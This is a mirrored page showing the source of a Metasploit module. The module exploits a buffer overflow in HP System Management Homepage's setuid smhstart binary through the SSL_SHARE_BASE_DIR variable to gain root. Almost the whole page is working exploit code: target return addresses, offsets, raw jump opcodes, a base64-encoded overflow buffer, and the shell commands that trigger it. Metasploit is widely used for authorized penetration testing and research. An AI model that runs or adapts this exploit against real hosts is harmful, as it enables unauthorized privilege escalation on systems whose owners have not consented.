Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/hp_smhstart.rb
19718 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Post::File

11


12
  include Msf::Exploit::Local::Linux

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        {

19
          'Name' => 'HP System Management Homepage Local Privilege Escalation',

20
          'Description' => %q{

21
            Versions of HP System Management Homepage <= 7.1.2 include a setuid root

22
            smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR

23
            env variable.

24
          },

25
          'License' => MSF_LICENSE,

26
          'Author' => [

27
            'agix' # @agixid # Vulnerability discovery and Metasploit module

28
          ],

29
          'Platform' => [ 'linux' ],

30
          'Arch' => [ ARCH_X86 ],

31
          'SessionTypes' => [ 'shell' ],

32
          'Payload' => {

33
            'Space' => 227,

34
            'BadChars' => "\x00\x22"

35
          },

36
          'References' => [

37
            ['OSVDB', '91990']

38
          ],

39
          'Targets' => [

40
            [

41
              'HP System Management Homepage 7.1.1',

42
              {

43
                'Arch' => ARCH_X86,

44
                'CallEsp' => 0x080c86eb, # call esp

45
                'Offset' => 58

46
              }

47
            ],

48
            [

49
              'HP System Management Homepage 7.1.2',

50
              {

51
                'Arch' => ARCH_X86,

52
                'CallEsp' => 0x080c8b9b, # call esp

53
                'Offset' => 58

54
              }

55
            ],

56
          ],

57
          'DefaultOptions' => {

58
            'PrependSetuid' => true

59
          },

60
          'DefaultTarget' => 0,

61
          'DisclosureDate' => '2013-03-30',

62
          'Notes' => {

63
            'Reliability' => UNKNOWN_RELIABILITY,

64
            'Stability' => UNKNOWN_STABILITY,

65
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

66
          },

67
        }

68
      )

69
    )

70
    register_options([

71
      OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])

72
    ])

73
  end

74


75
  def exploit

76
    pl = payload.encoded

77
    padding = rand_text_alpha(target['Offset'])

78
    ret = [target['CallEsp']].pack('V')

79
    exploit = pl

80
    exploit << ret

81
    exploit << "\x81\xc4\x11\xff\xff\xff"	# add esp, 0xffffff11

82
    exploit << "\xe9\x0e\xff\xff\xff"	# jmp => beginning of pl

83
    exploit << padding

84
    exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better

85
    id = cmd_exec("id -un")

86
    if id != "hpsmh"

87
      fail_with(Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")

88
    end

89
    cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")

90
    cmd_exec("#{datastore['smhstartDir']}/smhstart")

91
  end

92
end

93


94